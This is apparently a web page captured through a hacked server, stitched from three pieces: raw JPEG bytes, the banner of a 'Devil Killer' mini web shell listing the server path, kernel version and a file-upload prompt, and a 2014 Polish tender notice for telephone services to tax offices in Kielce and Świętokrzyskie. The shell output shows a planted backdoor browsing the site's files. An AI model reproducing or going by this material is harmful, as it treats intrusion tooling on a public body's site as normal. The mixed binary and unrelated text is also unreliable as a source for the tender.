JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20140814/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20140814/271864-N-2014.html

<p class="kh_header"><b>Kielce: usługi telekomunikacyjne w zakresie telefonii stacjonarnej  świadczone przez operatora telekomunikacyjnego dla Izby Skarbowej w Kielcach i urzędów  skarbowych woj. świętokrzyskiego</b><br>
<b>Numer ogłoszenia: 271864 - 2014; data zamieszczenia: 14.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Drugi Urząd Skarbowy w Kielcach , ul. Częstochowska 20, 25-647 Kielce, woj. świętokrzyskie, tel. 41 36 47 000, faks 41 36 47 250.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.drugi-kielce.us.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> usługi telekomunikacyjne w zakresie telefonii stacjonarnej  świadczone przez operatora telekomunikacyjnego dla Izby Skarbowej w Kielcach i urzędów  skarbowych woj. świętokrzyskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> WYKAZ JEDNOSTEK  UCZESTNICZĄCYCH W POSTĘPOWANIU
Pełny zakres usług dla wszystkich jednostek zawiera SIWZ.
L.p.
Nazwa jednostki
Adres	Adres
	       	   data
		przystąpienia
 przystąpienia
do postępowania
NIP
REGON
1
Izba Skarbowa w Kielcach
ul. Witosa 78b, 
25-561 Kielce
1.01.2015
959-07-88-263
001021240
2
Urząd Skarbowy Busko-Zdrój
ul. 12 Stycznia 17, 28-100 Busko Zdrój
1.01.2015
656-13-06-531
290007431
3
Urząd Skarbowy Jędrzejów
ul.  11 Listopada 33,
28-300 Jędrzejów
1.01.2015
656-15-09-000
290007448
4
Pierwszy Urząd Skarbowy Kielce
ul. Wróbla 17, 25-661 Kielce
1.01.2015
657-18-20-260
290007460
5
Urząd Skarbowy Kazimierza Wielka
ul. Kościuszki 16, 28-500 Kazimierza Wielka
1.01.2015
662-17-46-325
292846578
6
Urząd Skarbowy Końskie
ul. Piłsudskiego 156b, 26-200 Końskie
1.01.2015
658-12-24-667
290007454
7
Urząd Skarbowy Opatów
ul. Kilińskiego 9, 27-500 Opatów
1.04.2015
863-10-82-744
830001630
8
Urząd Skarbowy Ostrowiec Świętokrzyski
ul. Polna 11, 27-400 Ostrowiec Św.
1.01.2015
661-10-15-850
290007477
9
Urząd Skarbowy Pińczów
ul. Grodziskowa 1, 28-400 Pińczów
1.01.2015
662-12-89-750
290007508
10
Urząd Skarbowy Sandomierz
ul. Żydowska 1, 27-600 Sandomierz
1.01.2015
864-11-05-412
830001592
11
Urząd Skarbowy Skarżysko-Kamienna
ul. 1 Maja 56, 26-110 Skarżysko Kamienna
1.01.2015
663-13-90-901
290007490
12
Urząd Skarbowy Starachowice
ul. Składowa 33, 27-200 Starachowice
1.01.2015
664-14-64-682
290007514
13
Urząd Skarbowy Staszów
ul. Oględowska 12, 28-200  Staszów
16.11.2015
866-104-08-16
830001600
14
Urząd Skarbowy Włoszczowa
ul. Wiśniowa 10, 29-100 Włoszczowa
1.01.2015
656-22-09-932
260001370
15
Drugi Urząd Skarbowy w Kielcach
 i Świętokrzyski Urząd Skarbowy w Kielcach
ul. Częstochowska 20,  25-647 Kielce
1.01.2015
959-01-45-683
290539317
SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA
Ogólne warunki realizacji zamówienia.
Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas realizacji przedmiotu zamówienia.
Wykonawca zapewni należyte wykonanie przedmiotu zamówienia, w szczególności zobowiązuje się do świadczenia usług telekomunikacyjnych w sposób ciągły tj. codziennie przez całą dobę przez okres realizacji zamówienia, zapewniając wysoką jakość świadczonych usług.
Zamawiający wymaga by ewentualne koszty instalacyjne wliczone zostały w cenę rozmów.
Zamawiający nie dopuszcza możliwości  wzrostu cen  w okresie obowiązywania umowy.
Z uwagi na specyfikę działalności Izby Skarbowej, oraz urzędów skarbowych jako państwowych jednostek budżetowych, a co za tym idzie konieczność zapewnienia nieprzerwanego i niezawodnego połączenia telefonicznego i faksowego oraz połączenia transmisji danych, Zamawiający nie dopuszcza świadczenia usługi, będącej przedmiotem niniejszego zamówienia, drogą radiową. W szczególności Zamawiający zwraca uwagę na możliwość zewnętrznego zakłócenia transmisji radiowej poprzez m.in. blokowanie bądź zagłuszanie sygnału. W zakresie specyficznej działalności jaką prowadzi Zamawiający, istnieje prawdopodobieństwo celowego ingerowania podmiotów zewnętrznych w celu np. zagłuszania sygnału radiowego i pozbawienia połączenia telefonicznego 
i faksowego.
       Na ewentualne wnioski o dopuszczenie świadczenia usługi drogą radiową Zamawiający informuje, że  nie będą one uwzględniane i w tym zakresie nie będzie zmiany zapisów SIWZ.
Wykonawca zapewni możliwość sprawdzenia współpracy urządzeń Zamawiającego z urządzeniami Wykonawcy na min. 7 dni roboczych przed terminem rozpoczęciem świadczenia usług.
Wykonawca zobowiązany jest do przestrzegania tajemnicy telekomunikacyjnej oraz przepisów ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (t.j. Dz.U. z 2002r. Nr 101, poz. 926 z późn. zm.).
Wszelkie koszty związane z uruchomieniem świadczonej usługi ponosi Wykonawca.
Po uprzednim powiadomieniu i uzgodnieniu terminu , Zamawiający umożliwi Wykonawcy wykonanie wizji lokalnej w jednostce uczestniczącej w postępowaniu. 
W związku z planowaną konsolidacją  w jednostkach skarbowych Wykonawca będzie wystawiał jedną fakturę, której płatnikiem będzie Izba Skarbowa w Kielcach.. Na fakturach tych muszą zostać umieszczone informacje dotyczące ilości, czasu trwania i kosztów rozmów poszczególnych abonentów wymienionych w załączniku Nr 6 do SIWZ W przypadku nie wejścia w życie konsolidacji Wykonawca wystawiał będzie faktury dla każdej jednostki oddzielnie  za usługi telekomunikacyjne świadczone na jej rzecz.
Zamawiający wymaga od Wykonawcy rzetelnych, czytelnych faktur nie wymagających stosowania żadnych przeliczeń w celu uzyskania wysokości stawek za połączenia.
 Zamawiający wymaga, aby wszystkie numery telefonów wykazane w załączniku Nr 7 w poszczególnych jednostkach nie uległy zmianie.
 Zamawiający informuje, ze altualnie umowy na świadczenie usług łączności telefonicznej  zawarte przez wszystkie jednostki obowiązują do  31 grudnia 2014 r.z wyjątkiem Urzędu Skarbowego w Opatowie i Urzędu Skarbowego 
w Staszowie. Zawarte przez te Urzędy umowy wygasają odpowiednio : Urząd Skarbowy Opatów - 31 marca 2015 r, Urząd Skarbowy Staszów - 15 listopada 2015 r. i od następnego dnia jednostki te muszą być objęte umową.
Opis przedmiotu zamówienia.
1. Przedmiotem zamówienia jest:
a)   świadczenie usług telefonii stacjonarnej dla linii Zamawiającego, w zakresie połączeń wychodzących miejscowych,                                  	strefowych, międzystrefowych i do sieci telefonii komórkowych, w naliczaniu sekundowym,
b)   świadczenie usług telefonicznych dla Zamawiającego, w zakresie połączeń przychodzących miejscowych, 
  strefowych, międzystrefowych i międzynarodowych i  z sieci telefonii komórkowych, na numery Zamawiającego.
Wykonawca  rozliczał będzie usługę obciążając Zamawiającego jedynie kosztami połączeń ( rozmów) wychodzących .    Wszystkie koszty w tym abonamenty muszą być wliczone w cenę rozmów.
       Szczegółowy wykaz jednostek organizacyjnych oraz  dane dotyczące wykorzystywanych  central telefonicznych,  operatorów, obowiązujących umów, zakres numeracji linii zewnętrznych i numerów bezpośrednich, struktury połączeń   określa załącznik nr 7 do SIWZ.
2. Wykonawca zapewni należyte wykonanie przedmiotu zamówienia, o którym mowa w pkt. 1, w szczególności 	zobowiązuje się do świadczenia usług telekomunikacyjnych w sposób ciągły tj. codziennie przez całą dobę przez okres realizacji zamówienia z zapewnieniem wysokiej jakości połączeń tj. poprawności wybierania numerów w kierunku wychodzącym i przychodzącym, braku zakłóceń utrudniających lub uniemożliwiających korzystanie z usług.
3. Usługa połączeń telefonicznych musi być zrealizowana dla Zamawiającego przy wykorzystaniu stacjonarnego zakończenia sieci dostarczanego przez Wykonawcę w postaci cyfrowych łączy ISDN-PRA, ISDN-BRA oraz łączy analogowych w ilości i rodzaju podanych w załączniku nr 7 do SIWZ, oddzielnie dla każdego obiektu/lokalizacji. Zamawiający wymaga, by połączenie sieci Wykonawcy z siecią Zamawiającego dokonywane było w każdym 	obiekcie-lokalizacji, na przełącznicy telekomunikacyjnej Zamawiającego.
4. W przypadku zakończenia usługi stykiem ISDN PRA z sygnalizacją DSS1 Zamawiający wymaga by urządzenia 	końcowe zainstalowane były w pomieszczeniach węzłów teleinformatycznych ze stykiem G703lubG704.
5. W przypadku zakończeń interfejsów PRA, BRA i analogowych, Wykonawca we własnym zakresie zapewni ciągłość 	pracy w/w. styków w przypadku braku zasilania z sieci energetycznej, jeżeli urządzenia te wymagają zasilania przez 	minimum 3 godziny
6. Zamawiający zachowuje dotychczasowe numery telefoniczne. 
7. Zamawiający nie poniesie opłaty jednorazowej związanej z ewentualnym przeniesieniem obecnego zakresu 	numeracyjnego do sieci Wykonawcy.
8. Zamawiający wymaga by ewentualne koszty związane z usługami DDI, MSN, PBX wliczone zostały w cenę  rozmów
9. Wykonawca zapewni możliwość wykonywania połączeń do wszystkich sieci telekomunikacyjnych krajowych.
10. Wykonawca zapewni możliwość przyjmowania połączeń z innych sieci telekomunikacyjnych krajowych i zagranicznych.
11. Zamawiający wymaga zapewnienia usług: CLIP, CLIR, COLP, COLR, FSK. Ewentualny koszt tych usług należy 	wliczyć w koszty rozmów.
12. Wykonawca zapewni sekundowe naliczanie opłat za usługi telekomunikacyjne, (od momentu uzyskania połączenia do momentu rozłączenia się rozmówcy) i będzie naliczał koszty połączeń wg stawek ze złożonej oferty.
13. Wykonawca zapewni Zamawiającemu stałe kierowanie połączeń krajowych  do własnej sieci bez konieczności każdorazowego wybierania numeru dostępowego sieci (prefiksu operatora).
14. Zamawiający nie dopuszcza żadnych opłat za inicjację połączenia.
15. Wykonawca zapewni możliwość realizacji połączeń ze wszystkimi numerami krajowego planu numeracyjnego, również z numerami usługowymi i specjalnymi innych operatorów.
16. Dla wszystkich numerów o podwyższonej płatności oraz połączeń międzynarodowych Zamawiający wymaga bezpłatnej blokady połączeń wychodzących przy zachowaniu możliwości jej usunięcia na pisemne żądanie Zamawiającego.
17.  Wykonawca nie dokona blokady połączeń krajowych na numery infolinii 800 ... oraz innych usług typu informacja 
o numerach telefonów, usługa informuj i łącz. Opłata za tego typu połączenia następować będzie wg taryfy operatora ( Wykonawcy ). Zamawiający zastrzega sobie możliwość blokady tych usług.
18. Zamawiający wymaga by Wykonawca dostarczał na żądanie, bezpłatnie pełne zestawienie bilingowe tzn. wykaz zrealizowanych połączeń zawierający informację o numerze wybieranym, godzinę, datę połączenia, czas trwania połączenia wraz z rzeczywistymi kosztami. Zamawiający wymaga udostępniania tych informacji poprzez stronę 	WWW dedykowaną dla obsługi konta Zamawiającego lub za pomocą nośnika CD lub inną formą elektroniczną (np. 	przesłanie pliku   e-mailem) nie później niż w terminie do 14 dni roboczych od  złożenia wniosku. Wykonawca razem 	z ofertą przekaże dane teleadresowe związane ze składaniem wniosków, o których mowa powyżej.
19. Zamawiający nie dopuszcza możliwości wzrostu cen za  połączenia w okresie obowiązywania umowy.
20. W ramach przedstawionej oferty Wykonawca zobowiązuje się nie naliczać opłat za połączenia, o których mowa 
w pkt 17  wyższych niż ceny oferowane przez Wykonawcę w ofercie publicznej dla klientów biznesowych. Pod pojęciem podmiot biznesowy należy rozumieć przedsiębiorcę prowadzącego działalność gospodarczą. Pojęcie nie obejmuje klientów indywidualnych, z którymi Wykonawcy zawierają umowy konsumenckie.
21. Wykonawca dołączy do przedstawionej oferty oficjalny cennik dla klientów biznesowych w  ofercie publicznej.
22. Zamawiający dopuszcza następujące rozwiązania techniczne dla świadczenia usług telefonii stacjonarnej dla 	wskazanych lokalizacji w przedmiocie zamówienia:
a)  doprowadzenie kablem optotelekomunikacyjnym,
b)  doprowadzenie kablem telekomunikacyjnym o żyłach miedzianych,
Z uwagi na specyfikę działalności urzędów skarbowych jako państwowych jednostek budżetowych, a co za tym idzie konieczność zapewnienia nieprzerwanego i niezawodnego połączenia telefonicznego i faksowego oraz połączenia transmisji danych, Zamawiający nie dopuszcza świadczenia usługi, będącej przedmiotem niniejszego zamówienia, drogą radiową. W szczególności Zamawiający zwraca uwagę na fakt narażenia transmisji radiowej na możliwość zewnętrznego zakłócenia transmisji radiowej poprzez m.in. blokowanie bądź zagłuszanie sygnału. W zakresie specyficznej działalności jaką prowadzi Zamawiający, istnieje prawdopodobieństwo celowego ingerowania podmiotów zewnętrznych w celu np. zagłuszania sygnału radiowego i pozbawienia połączenia telefonicznego i faksowego.
23. Zamawiający zastrzega, iż usługa nie może być doprowadzona do miejsca świadczenia z użyciem dostępu radiowego  oraz technologii alternatywnych, tj. bramki GSM, numery dostępowe, VoIP.
24. Wykonawca zapewni brak naliczania kosztów za połączenia telefoniczne oraz faksem pomiędzy Zamawiającymi, biorącymi udział w zamówieniu wspólnym wymienionymi w załączniku nr 6, 
25  W przypadku wymiany centrali telefonicznej przez uczestnika wspólnego postępowania Wykonawca zapewni świadczenie usług jak w złożonej ofercie w tych jednostkach.
28. Wykonawca zapewni możliwość zmian typu lub i ilości łączy w poszczególnych jednostkach   uczestniczących we wspólnym postępowaniu ( załącznik Nr 6 ) polegających na: 
a)  bez ponoszenia dodatkowych kosztów Zamawiający zastrzega sobie prawo rezygnacji w   okresie obowiązywania umowy z 10 % łączy lub numerów telefonów,                               
b)  bez  ponoszenia dodatkowych kosztów Zamawiający zastrzega sobie prawo do zwiększenia   w ramach obowiązującej umowy ilości łączy i numerów telefonów nie więcej niż o 5 %.
29. Usuwanie awarii ( określony  czas dotyczy dni roboczych):                                                     
a)  w  przypadku wystąpienia awarii Wykonawca  musi w terminie 8 godzin od  zgłoszenia  ( telefonicznego, na 	piśmie, faksem lub mailem)  podjąć działania prowadzące do jej  usunięcia  
 b)  w ciągu 25 godzin musi nastąpić przywrócenie łączności. W przypadku wystąpienia awarii spowodowanej klęskami żywiołowymi lub bezprawnym działaniem osób trzecich, termin  ten będzie ustalany indywidualnie.	
Szczegółowy wykaz jednostek biorących udział w postępowaniu oraz  dane dotyczące wykorzystywanych  central telefonicznych, operatorów, zakres numeracji linii zewnętrznych i numerów bezpośrednich, struktury połączeń  itp.  Wielkości podane w tabelach (Struktura rozmów) oraz wszystkie  kwoty   ( brutto  po zaokrągleniu do pełnych zł) dotyczą okresu  12 miesięcy (od  1.07.2013 do 30.06.2014) zawiera SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 64.21.10.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia warunek dotyczący posiadania uprawnień do 	wykonywania działalności telekomunikacyjnej, jeżeli  przedstawi  zaświadczenie o wpisie do 	rejestru przedsiębiorców telekomunikacyjnych prowadzonego przez Prezesa Urzędu  	Komunikacji Elektronicznej, wydane na podstawie art.11 w zw. z art.10 ustawy z dnia 16 lipca 	2004r. - Prawo telekomunikacyjne (t.j. Dz.U. z 2014 r, poz.243), zwanej dalej ustawą PT</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dotyczący posiadania wiedzy 	
     i doświadczenia, niezbędnych do wykonywania przedmiotowego zamówienia wówczas, gdy  	wykonał bądź wykonuje, w okresie ostatnich trzech lat przed upływem terminu składania ofert, 
         a 	jeżeli okres prowadzonej działalności gospodarczej jest krótszy - w tym okresie, co najmniej  	dwie usługi telekomunikacyjne w zakresie telefonii stacjonarnej dla podmiotów biznesowych 	o wartości rocznej minimum 30.000 PLN  ( brutto) każda (słownie: trzydzieści tysięcy złotych)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna, że 	Wykonawca spełnia te warunki, gdy ten oświadczy, że dysponuje potencjałem technicznym 	i osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych 	podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia 	oraz znajduje się w sytuacji finansowej i ekonomicznej zapewniającej wykonanie zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>jak w pkt III.3.3</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>jak w pkt III.3.3</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W celu potwierdzenia, że wykonawca spełnia warunki udziału w postępowaniu oraz nie podlega 	wykluczeniu na podstawie art.24 ustawy PZP, należy złożyć następujące dokumenty:
a) oświadczenie o spełnianiu warunków udziału w postępowaniu, wg wzoru stanowiącego załącznik nr 2 do SIWZ,
b) oświadczenie o braku podstaw do wykluczenia na podstawie art.24 ust.1 ustawy PZP, wg wzoru stanowiącego załącznik nr 3 do SIWZ,
c) aktualne zaświadczenie o wpisie do rejestru przedsiębiorców telekomunikacyjnych, wydane na podstawie art.11 w zw. z art.10 ustawy PT.
